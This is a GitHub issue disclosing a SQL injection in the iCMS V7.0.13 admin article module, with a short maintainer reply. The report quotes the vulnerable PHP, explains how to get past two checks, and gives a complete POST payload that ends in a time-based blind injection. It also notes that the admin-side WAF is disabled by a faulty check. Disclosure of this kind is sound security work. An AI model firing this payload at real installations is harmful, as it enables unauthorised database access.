Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

iCMS V7.0.13 Has A SQLi vulnerability in article.admincp.php #47

awindog opened this issue Jan 10, 2019 · 1 comment


Copy link

commented Jan 10, 2019

The vulnerability is in background
In line 898,in this code ,we can contol $_data_id

        $_data_id = stripslashes($_POST['_data_id']);
        $_data_id = json_decode($_data_id,true);
        $_count   = count($_data_id);

We can post data and due to stripslashes() ,we alse can post a ' successfully.
In line 930

            $dkey = array_search($adid, $_data_id);
            if($dkey!==false && $_chapter){//撤消章节时
                if($_data_id)foreach ($_data_id as $_id) {
                    $_id && article::del_data($_id,'id');

If $_data_id is a arary , $dkey!==false , $_chapter has a value that we can send $_id to article::del_data($_id,'id')

In article.class.php

public static function del_data($id,$f='aid'){
    iDB::query("DELETE FROM `#iCMS@__article_data` WHERE `$f`='$id'");

And the public function article_data() used in public function do_save() in line 751 $url OR $this->article_data($body,$aid,$haspic,$_chapter);
we can find that $dkey = array_search($adid, $_data_id);,we don't know the $adid,but we can post a many data to bypass this ,like "1":"1","2":"2"......"1000":"1000"
And the $_chapter,$_chapter = (int)$_POST['chapter'];,we can send chapter=1 to bypass.
so that the final payload is
_cid=&_scid=&_tags=&_pid=&_data_id=&article_id=0&userid=1&ucid=&postype=1&REFERER=http%3A%2F%2Flocalhost%2FiCMSv7013%2Fadmincp.php%3Fapp%3Darticle%26do%3Dtrash&chapter=1&markdown=0&cid=1&status=1&scid%5B%5D=1&pid%5B%5D=0&title=aaaaa&stitle=aa&source=&author=&editor=iCMS&pic=&mpic=&spic=&keywords=&tags=a&description=a&data_id=&subtitle=&autopic=1&body%5B%5D=%3Cp%3Eaaaaaaaaaaaaa%3Cbr%2F%3E%3C%2Fp%3E&pubdate=2019-01-05+14%3A04%3A14&sortnum=1546668254&weight=1546668254&hits=0&hits_today=0&hits_yday=0&hits_week=0&hits_month=0&favorite=0&comments=0&good=0&bad=0&tpl=&clink=&url=&_data_id={"1":"1","2":"2"......"1000":"1000","1001":"1' and sleep (3)%23"}

And another very very very very very import problem is that in admincp.php ,define('iPHP_WAF_POST',false); but in IWAF.class.php,you use defined('iPHP_WAF_POST') OR define('iPHP_WAF_POST',true);,but this place use defined('iPHP_WAF_POST') of course return ture ,that mean this WAF in background is no any use!!!!!!!!!!!!so that I can use sleep(3) and continue injecting.

author by


This comment has been minimized.

Copy link

commented Jan 10, 2019

Thank you, we will fix it as soon as possible

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
2 participants
You can’t perform that action at this time.